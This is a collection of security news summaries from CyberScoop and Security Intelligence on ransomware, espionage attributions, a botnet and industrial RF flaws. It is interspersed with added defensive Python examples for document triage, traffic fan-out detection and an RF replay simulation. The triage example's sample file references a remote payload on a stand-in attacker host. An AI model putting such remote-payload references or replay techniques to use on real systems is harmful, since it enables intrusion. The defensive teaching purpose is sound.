Researchers paint different portraits of hackers behind Ryuk ransomware

Analysts poring over the Ryuk ransomware are coming to different conclusions about the hackers responsible and the victims they’re targeting, highlighting the subjective side of cyberthreat studies. One thing, however, is clear: the infectious malware pays. Newly published research from McAfee and Coveware finds that the average ransom payment involving Ryuk is more than 10 times that of other types of ransomware. Some victims of Ryuk “either lost their data or took on staggering financial risk to pay the ransom,” the researchers wrote. In some cases, Ryuk’s purveyors took big payouts of over 100 bitcoin (nearly $400,000 at current rates), in others they were satisfied with squeezing smaller sums from the victims, the McAfee-Coveware report said. The research follows a January report from another company, CrowdStrike, saying that hackers had earned $3.7 million from Ryuk since the ransomware emerged in August. Victims have reportedly included a North Carolina water utility and multiple […]

The post Researchers paint different portraits of hackers behind Ryuk ransomware appeared first on CyberScoop.

Password manager report gets researcher booted from Bugcrowd

The author of newly published research that examines flaws in password managers has been kicked off Bugcrowd, a popular vulnerability-reporting platform, after one of the companies named in the research reported the author for violating Bugcrowd’s terms of service. Bugcrowd shut down Adrian Bednarek’s account after he violated the company’s rules on “unauthorized disclosure” by telling a reporter about a vulnerability in LastPass, a password management service. The vulnerability is an old bug that another researcher had already reported but that had not been fixed. According to a disclosure timeline he shared with CyberScoop, Bednarek found himself banned from Bugcrowd on Feb. 12, a day after he said he spoke with The Washington Post for a report that his consulting company, Independent Security Evaluators (ISE), ultimately published Tuesday. Bednarek had reported the vulnerability to Bugcrowd on Jan. 19. After being told it was a duplicate, he raised concerns that the bug still hadn’t been […]

The post Password manager report gets researcher booted from Bugcrowd appeared first on CyberScoop.

Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security

Limor Kessem studied microbiology in school and planned to open a naturopathy clinic. She’s now one of IBM Security’s top cyber intelligence experts and a dedicated role model for women in security.

The post Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security appeared first on Security Intelligence.

Right country, wrong group? Researchers say it wasn’t APT10 that hacked Norwegian software firm

Keeping the world’s dizzying array of hacking groups straight has become a challenge for researchers and journalists. One person’s Helix Kitten is another’s OilRig, sowing confusion — in this writer as well as others — about where one group ends and the next one begins. But getting hacking taxonomy right matters because knowing which group is responsible for malicious activity can help network defenders secure their data. That’s why researchers from multiple companies are pointing out what they say is a case of mistaken attribution of a global hacking operation. A report published last week by cybersecurity companies Recorded Future and Rapid7 blamed a well-known Chinese threat group, labeled APT10 in the West, for breaching a Norwegian software vendor, a U.S. law firm, and an international apparel company. APT10, which U.S. officials and private analysts have linked to China’s civilian intelligence agency, gained greater notoriety in December when the Department of Justice announced […]

The post Right country, wrong group? Researchers say it wasn’t APT10 that hacked Norwegian software firm appeared first on CyberScoop.

Hack of billion-dollar Norwegian firm is tied to Chinese espionage group APT10

Weeks after the Department of Justice announced the indictment of two men linked with a Chinese state-sponsored hacking group, security researchers say they have uncovered a cyber-espionage campaign by the same entity against a European software company, a U.S. law firm, and a global apparel company. Analysts at Recorded Future and Rapid7 tracked the hacking operation between November 2017 and September 2018, and publicly revealed the breaches Wednesday. The researchers assessed with “high confidence” that APT10, a group tied to China’s civilian intelligence agency, was responsible for the hacking, calling the group “the most significant Chinese state-sponsored cyber threat to global corporations known to date.” Only one of the three victims is named: Visma, a billion-dollar Norwegian software company that claims 850,000 customers around the world. The hackers likely breached Visma to gain access to other organizations’ networks, the researchers said, but targeted the law and apparel firms “to gather information for commercial advantage.” Visma […]

The post Hack of billion-dollar Norwegian firm is tied to Chinese espionage group APT10 appeared first on CyberScoop.

How hackers used a PowerPoint file to spy on Tibet’s government-in-exile

A recently discovered PowerPoint file offers new clues on how hackers are trying to spy on Tibet’s government-in-exile. The malicious document was emailed to subscribers of a mailing list managed by the Central Tibetan Administration (CTA), the organization representing Tibet’s exiled government, according to Talos, Cisco’s threat intelligence unit. Tibet is officially part of China, but Tibetan leaders have lived in exile in India for decades. The email carried a file crafted to appeal to the recipients’ politics. The PowerPoint file name – “Tibet-was-never-a-part-of-China.ppsx” – caters to the CTA mailing list, as does the message in the body of the email marking the upcoming 60th anniversary of the exile of Tibetan spiritual leader the Dalai Lama, researchers said. “Unfortunately, this [is] just part of a continuing trend of nation-state actors working to spy on civilian populations for political reasons,” Talos researchers said in a blog published Monday. They did not attribute the […]
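A .ppsx file is an OOXML package, that is, a zip archive of XML parts, so a first-pass triage of a suspicious slideshow can be done without opening it in PowerPoint. The script below is an added example, not Talos code and not a description of how the Tibet lure worked: it walks the package and reports the two things a defender looks at first, parts that carry executable content (embedded OLE objects, VBA, ActiveX) and relationship entries whose target lives outside the package. The sample document, the part names and the hostname attacker.example are constructed for the example.

```python
"""Static triage of an OOXML package (.ppsx/.pptx/.docx) for embedded objects
and external relationship targets. Added example; the sample package below is
constructed inline so the script runs offline."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Parts whose mere presence in a slideshow sent by e-mail deserves a second look.
SUSPICIOUS_PART_PATTERNS = (
    re.compile(r"^ppt/embeddings/"),   # embedded OLE objects / binaries
    re.compile(r"/vbaProject\.bin$"),  # VBA macros
    re.compile(r"/activeX/"),          # ActiveX controls
)


def triage_ooxml(data: bytes) -> dict:
    """Return findings for an OOXML package supplied as raw bytes."""
    findings = {"suspicious_parts": [], "external_targets": [], "bad_zip": False}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        findings["bad_zip"] = True  # not a zip at all: mislabelled or corrupt file
        return findings
    with zf:
        for name in zf.namelist():
            if any(p.search(name) for p in SUSPICIOUS_PART_PATTERNS):
                findings["suspicious_parts"].append(name)
            if name.endswith(".rels"):
                # Every .rels part lists that part's relationships; an entry with
                # TargetMode="External" points outside the package (URL or UNC path).
                root = ET.fromstring(zf.read(name))
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                        findings["external_targets"].append((name, rel_type, rel.get("Target")))
    return findings


def needs_review(findings: dict) -> bool:
    """True when anything in the findings warrants an analyst's attention."""
    return bool(findings["bad_zip"] or findings["suspicious_parts"] or findings["external_targets"])


def build_sample_ppsx() -> bytes:
    """Constructed minimal package (assumed layout, not the real lure): one slide
    whose relationships reference a remote OLE object and an embedded binary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
        zf.writestr(
            "ppt/slides/_rels/slide1.xml.rels",
            f'<Relationships xmlns="{REL_NS}">'
            '<Relationship Id="rId1" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            'Target="http://attacker.example/payload.sct" TargetMode="External"/>'
            '<Relationship Id="rId2" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            'Target="../embeddings/oleObject1.bin"/>'
            "</Relationships>",
        )
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_ooxml(build_sample_ppsx())
    for part in result["suspicious_parts"]:
        print("suspicious part:", part)
    for rels, rel_type, target in result["external_targets"]:
        print(f"external {rel_type} target in {rels}: {target}")
    print("needs review:", needs_review(result))
```

Run it against a real file with `triage_ooxml(open(path, "rb").read())`. The check is deliberately shallow: a clean result only means the package contains none of these specific indicators, not that the file is safe.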

The post How hackers used a PowerPoint file to spy on Tibet’s government-in-exile appeared first on CyberScoop.

CenturyLink sounds the alarm about TheMoon botnet, a versatile tool for fraud

Botnets have been a staple of malicious cyber activity for years because they can be cheap and facilitate cyberattacks at scale. Now, new research highlights how versatile hordes of infected computers can be in catering to hackers’ needs, from advertisement fraud to brute-force attacks. Researchers at communications provider CenturyLink said Thursday they spent a year tracking a botnet dubbed TheMoon, which can be repurposed by hackers for a range of malicious services. CenturyLink’s team found an iteration of TheMoon that uses infected microprocessor-based devices as proxy servers that can be sold to other attackers. In one case, researchers said they watched a video-ad fraudster use a proxy service to send requests to 19,000 different URLs from one server in the span of six hours. The ease with which TheMoon enables fraud should have companies on alert. “We have reason to believe the botnet actor has sold this proxy botnet as a service to other […]
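The ad-fraud pattern described above, one proxy host requesting 19,000 distinct URLs in six hours, is detectable from ordinary proxy or egress logs: a legitimate client rarely fans out to that many distinct destinations in a short window. The code below is an added example, not CenturyLink's detection logic, and runs a sliding-window distinct-URL count over a few constructed log lines (format `timestamp src_ip url`, assumed for the example). The threshold of 4 is chosen to fit the tiny sample; on real traffic it would be tuned per environment.

```python
"""Flag source IPs whose distinct-URL fan-out inside a sliding window exceeds a
threshold. Added example; the log lines are constructed, not real traffic."""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.5 fans out to five hosts in 40 minutes (proxy-like),
# 10.0.0.9 polls one URL, 10.0.0.7 visits four URLs but eight hours apart.
SAMPLE_LOG = """\
2019-02-01T00:00:00 10.0.0.5 http://ads-a.example/ad1
2019-02-01T00:10:00 10.0.0.5 http://ads-b.example/ad7
2019-02-01T00:20:00 10.0.0.5 http://ads-c.example/v
2019-02-01T00:30:00 10.0.0.5 http://ads-d.example/v
2019-02-01T00:40:00 10.0.0.5 http://ads-e.example/v
2019-02-01T01:00:00 10.0.0.9 http://intranet.example/status
2019-02-01T02:00:00 10.0.0.9 http://intranet.example/status
2019-02-01T03:00:00 10.0.0.9 http://intranet.example/status
2019-02-01T00:00:00 10.0.0.7 http://news.example/a
2019-02-01T08:00:00 10.0.0.7 http://news.example/b
2019-02-01T16:00:00 10.0.0.7 http://news.example/c
2019-02-02T00:00:00 10.0.0.7 http://news.example/d
""".splitlines()


def parse_line(line: str):
    """Assumed log format: ISO timestamp, source IP, requested URL."""
    ts, src, url = line.split()
    return datetime.fromisoformat(ts), src, url


def find_proxy_fanout(lines, window=timedelta(hours=6), threshold=4) -> dict:
    """Return {src_ip: peak distinct URLs seen in any `window`} for sources whose
    peak reaches `threshold`."""
    by_src = defaultdict(list)
    for line in lines:
        ts, src, url = parse_line(line)
        by_src[src].append((ts, url))

    flagged = {}
    for src, events in by_src.items():
        events.sort()               # process each source in time order
        recent = deque()            # events inside the current window
        seen = Counter()            # distinct URL -> occurrences in window
        peak = 0
        for ts, url in events:
            recent.append((ts, url))
            seen[url] += 1
            # Expire events that fell out of the window ending at `ts`.
            while recent and recent[0][0] < ts - window:
                _, old_url = recent.popleft()
                seen[old_url] -= 1
                if seen[old_url] == 0:
                    del seen[old_url]
            peak = max(peak, len(seen))
        if peak >= threshold:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for src, peak in find_proxy_fanout(SAMPLE_LOG).items():
        print(f"{src}: {peak} distinct URLs within a 6h window")
```

Widening the window to 24 hours also catches the slow source 10.0.0.7, which illustrates the trade-off: a short window isolates bursty proxy abuse, a long one picks up ordinary browsing too.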

The post CenturyLink sounds the alarm about TheMoon botnet, a versatile tool for fraud appeared first on CyberScoop.

Look to the sky: How hackers could control cranes by abusing radio frequencies

Vulnerabilities in radio frequency protocols used by remote controllers could allow hackers to move cranes and other big machinery at construction sites and factories, security researchers said Tuesday, raising awareness of potential safety issues in widely used technology. A research team at cybersecurity company Trend Micro examined remote controllers made by seven vendors and found that all of them were susceptible to “replay attacks,” in which an attacker records a legitimate radio frequency (RF) transmission and retransmits it later, tricking the machinery into responding to the recorded commands. In other words, the researchers said, the remote control you use to open your garage is probably more secure than many controllers used to move industrial equipment. The main problem, Trend Micro said in a paper published Tuesday, is that instead of relying on standard wireless technologies, the industrial remote controllers depend on proprietary RF protocols that are decades old and “are primarily focused on safety at the expense of […]
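The garage-door comparison comes down to one property: a replayed frame must be rejected. The simulation below is an added example, not Trend Micro's tooling and not any vendor's real protocol; the frame layout, pairing ID and command code are assumed. It models a fixed-code receiver, which executes any frame carrying the right pairing ID, beside a receiver that requires a monotonically increasing counter under an HMAC, so that a recorded frame fails when it is played back and a tampered command fails the MAC check.

```python
"""Replay attack against a fixed-code RF controller versus a counter-plus-MAC
design. Added example with an assumed frame format; not a real vendor protocol."""
import hashlib
import hmac
import struct

CMD_HOIST_UP = 0x11  # assumed command code for the example


class FixedCodeTransmitter:
    """Legacy style: frame = static pairing ID + command, no freshness."""
    def __init__(self, pairing_id: int):
        self.pairing_id = pairing_id

    def send(self, cmd: int) -> bytes:
        return struct.pack(">IB", self.pairing_id, cmd)


class FixedCodeReceiver:
    def __init__(self, pairing_id: int):
        self.pairing_id = pairing_id
        self.executed = []

    def receive(self, frame: bytes) -> bool:
        pid, cmd = struct.unpack(">IB", frame)
        if pid != self.pairing_id:
            return False
        self.executed.append(cmd)   # any matching frame is acted on, replayed or not
        return True


class RollingCodeTransmitter:
    """Frame = pairing ID + 32-bit counter + command, authenticated with an
    8-byte HMAC-SHA256 tag under a key shared at pairing time."""
    def __init__(self, key: bytes, pairing_id: int):
        self.key = key
        self.pairing_id = pairing_id
        self.counter = 0

    def send(self, cmd: int) -> bytes:
        self.counter += 1
        body = struct.pack(">IIB", self.pairing_id, self.counter, cmd)
        tag = hmac.new(self.key, body, hashlib.sha256).digest()[:8]
        return body + tag


class RollingCodeReceiver:
    def __init__(self, key: bytes, pairing_id: int, lookahead: int = 16):
        self.key = key
        self.pairing_id = pairing_id
        self.lookahead = lookahead  # tolerate this many dropped frames
        self.last_counter = 0
        self.executed = []

    def receive(self, frame: bytes) -> bool:
        if len(frame) != 17:
            return False
        body, tag = frame[:9], frame[9:]
        pid, ctr, cmd = struct.unpack(">IIB", body)
        if pid != self.pairing_id:
            return False
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:8]
        if not hmac.compare_digest(tag, expected):
            return False            # forged or tampered frame
        if not (self.last_counter < ctr <= self.last_counter + self.lookahead):
            return False            # replayed, stale, or too far ahead
        self.last_counter = ctr
        self.executed.append(cmd)
        return True


def replay_attack(tx, rx, cmd: int):
    """Record one legitimate frame off the air, then play it back.
    Returns (accepted_first_time, accepted_on_replay)."""
    frame = tx.send(cmd)
    first = rx.receive(frame)
    replay = rx.receive(frame)
    return first, replay


if __name__ == "__main__":
    print("fixed code :", replay_attack(FixedCodeTransmitter(0x1234), FixedCodeReceiver(0x1234), CMD_HOIST_UP))
    key = b"pairing-key-shared-at-install"
    print("rolling+MAC:", replay_attack(RollingCodeTransmitter(key, 0x1234), RollingCodeReceiver(key, 0x1234), CMD_HOIST_UP))
```

A counter without the MAC would still stop naive replay but not forgery; the MAC without the counter would stop forgery but not replay. The receiver needs both, plus a bounded look-ahead so a few lost frames do not desynchronize the pair.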

The post Look to the sky: How hackers could control cranes by abusing radio frequencies appeared first on CyberScoop.

To raise security awareness, researchers spent months hacking mock building systems

Security experts have in recent months warned that building automation lags behind other critical infrastructure sectors when it comes to awareness of cyberthreats and appreciation of their potential impact. Now an 18-month research project, which tested malware and exploits on gear made by top vendors, is trying to change that. “In the 18 months that we’ve been working on this, we’ve engaged with a lot of stakeholders from the domain,” Elisa Costante, a senior director at ForeScout Technologies, told CyberScoop. “And now we really see that the reception has changed and everybody has realized the impact can be actually more critical” than many realized. After all, she said, the building-automation sector doesn’t just mean office buildings, but also includes hospitals, airports, and other critical infrastructure. ForeScout researchers assembled a lab of building-automation equipment, threw their custom malware at it, and then documented how effectively their code manipulated the gear. The project culminates Tuesday, when Costante will present her team’s work […]

The post To raise security awareness, researchers spent months hacking mock building systems appeared first on CyberScoop.
